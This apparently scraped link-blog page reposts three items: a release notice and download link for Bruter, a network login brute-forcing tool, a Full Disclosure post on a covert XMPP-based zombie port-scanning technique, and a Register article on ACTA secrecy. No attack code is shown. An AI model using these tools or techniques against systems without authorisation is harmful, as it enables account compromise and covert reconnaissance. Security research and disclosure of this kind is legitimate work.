HTTP (Basic)
HTTP (Form)
IMAP
MSSQL
MySQL
POP3
SMB-NT
SMTP
SNMP
SSH2
Telnet
VNC

Recent Changes

Re-licensed to new-BSD license
Added proxy support (CONNECT, SOCKS4, SOCKS5)
Allowed more delimiters in combo file
Added password length filter in combo and dictionary mode
Fixed miscellaneous bugs
Updated openssl library to 0.9.8n

You can download Bruter v1.0 Final here: Bruter_1.0.zip Or read more here.

Bruter v1.0 Final Released – Parallel Network Login Brute Forcing Tool | Darknet - The Darkside
-
Multiupload.com - upload your files to multiple file hosting sites!
-
At least you woke up to reality.
-
Hello fd-list folks. I recently demonstrated at Athcon, a new security conference taking place in Athens - Greece, a new stealthy port scanning attack that is made possible by abusing XMPP. The technique uses a "zombie" host (that can be anyone in your [most probably fake] friend/contact list) and some timing calculations in order to conduct a portscan through that proxy to any target. The IP address is never revealed to the scanned victim, the same way the famous idle/zombie scan, discovered by antirez, works. The idea, a proof of concept pidgin patch and a detailed analysis can be read in the paper.

You can find the whitepaper here: http://sock-raw.org/papers/abusing_network_protocols and the presentation slides: http://sock-raw.org/papers/anp_presentation.pdf

It is interesting to see how seemingly "innocent" protocols like XMPP can still be abused to do things like the above attack.

Regards,
ithilgore

Full Disclosure: A new zombie port scanning attack -- http://sock-raw.org
ithilgore (ithilgore) on Twitter
-
The level of secrecy shrouding the EU’s ACTA negotiations reached new heights earlier this week, with the news that Pirate Party MEP Christian Engstrom felt compelled to abandon a meeting with ACTA negotiators in the European Parliament after he was forbidden from sharing information with the public. According to a write-up on TorrentFreak, a blog dedicated to bringing the latest news about BitTorrent, Commission negotiators were scheduled to update European parliamentarians on progress in the latest round of ACTA negotiations in Lucerne. An invite went out to Pirate Party MEP Christian Engstrom, but the meeting was closed to the public and, he was informed, he was not allowed to share any information he obtained at the meeting with his electors. According to Engstrom: "At first the Commission seemed unwilling to answer this question with a straight yes or no, but after I had repeated the question a number of times, they finally came out and said that I would not be allowed to spread the information given." He then left the room, complaining that he was "not prepared to accept information given under such conditions in this particular case". Engstrom further accused the Commission of a "disgraceful" violation of the Lisbon Treaty, which requires full information to be provided to the European Parliament. A secret oral meeting with no documents handed out certainly does not meet this condition. One reason for nervousness on the part of ACTA negotiators may lie in an embarrassing leak earlier this year. French digital rights group La Quadrature du Net published online a consolidated version of the ACTA text, containing a full copy of the deal as it stood on 18 January, 2010. The problem is that most organisations leak, and the harder you try to keep something secret the greater the pressure to reveal. 
The only difference is that if you keep the wraps on for too long, not only will your secrets always eventually spill, but you end up looking sneaky and undemocratic as well.

Pirate Party storms out of uber-secret ACTA negotiations • The Register